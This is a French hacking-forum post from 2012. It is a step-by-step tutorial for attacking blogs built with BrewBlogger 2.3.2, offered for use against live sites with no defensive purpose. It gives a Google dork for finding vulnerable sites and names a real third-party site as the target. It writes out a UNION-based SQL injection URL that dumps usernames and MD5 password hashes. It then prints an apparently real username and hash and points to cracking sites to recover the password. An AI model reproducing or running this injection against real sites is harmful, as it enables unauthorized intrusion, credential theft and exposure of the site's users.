TehWoas Index du Forum
TehWoas
Site des challenges lobby
 
TehWoas Index du ForumFAQRechercherS’enregistrerConnexion

:: BrewBlogger 2.3.2 ::

 
Poster un nouveau sujet   Répondre au sujet    TehWoas Index du Forum -> Poster ici tout vos sites Hacker, Vos Virus et Vos tutos, stealer ect.... -> Failles Web
Sujet précédent :: Sujet suivant  
Auteur Message
TehWoas
Invité





MessagePosté le: Ven 21 Sep - 12:38 (2012)    Sujet du message: BrewBlogger 2.3.2 Répondre en citant

Bonjour à tous,

Dans ce tutoriel nous allons voir comment exploiter des site créer avec BrewBlogger.

Aller sur Google et taper ce Dork :


Code :

inurl:/sections/reference.inc.php?source=


Prenez un site au hasard, moi je vais prendre ce site : http://www.fagun.is/blog/

Ce qui a donner :


Code :

http://www.fagun.is/blog/sections/reference.inc.php?source=log&section=…


Vous arriverez sur une page avec une erreur MySQL c'est tout a fait normal, l'erreur MySQL prouve que le site est faillible.

Dans l'adresse URL si on remplace :


Code :

reference.inc.php?source=log&section=styles&sort=brewStyle&dir=ASC


Par ceci :


Code :

reference.inc.php?source=log&section=styles&filterStyle=null%20union%20select%20null,null,null,null,null,null,null,null,​null,null,null,null,
null,null,concat(user_name,0x3a,password),null,concat(realFirstName,0x20,realLas​tName)%20FROM%20users--#PiratoTeam


J'obtiens donc :

Citation:

Citation :fagun.is/blog/sections/reference.inc.php?source=log&section=styles&filterStyle=null%20union%20select%20null,null,null,null,null,null,null,null,​null,null,null,null,null,null,concat%28user_name,0x3a,password%29,null,concat%28​realFirstName,0x20,realLastName%29%20FROM%20users--#PiratoTeam

Vous allez donc récupérer pseudo et pass 


Exemple :


Code :

eyvindur:e624c762746ec612247315bbdf3fce1f


Le mot de passe est crypter en MD5, quelque site pour decrypt du MD5 :

http://decrypt.fr/
http://www.md5decrypter.com/
http://www.md5decrypter.co.uk/

On va donc tenter de decrypt son mot de passe :


Code :

e624c762746ec612247315bbdf3fce1f(md5)=eyvindur


Son pseudo c'est son mot de passe quel sécurité ...


Revenir en haut
Publicité






MessagePosté le: Ven 21 Sep - 12:38 (2012)    Sujet du message: Publicité

PublicitéSupprimer les publicités ?
Revenir en haut
Montrer les messages depuis:   
Poster un nouveau sujet   Répondre au sujet    TehWoas Index du Forum -> Poster ici tout vos sites Hacker, Vos Virus et Vos tutos, stealer ect.... -> Failles Web Toutes les heures sont au format GMT + 1 Heure
Page 1 sur 1

 
Sauter vers:  

Index | creer un forum | Forum gratuit d’entraide | Annuaire des forums gratuits | Signaler une violation | Conditions générales d'utilisation
Thème créé par TehWoas'
Powered by phpBB © 2012 phpBB Group
Traduction par : phpBB-fr.com
  • TehWoas™ ©2012-2013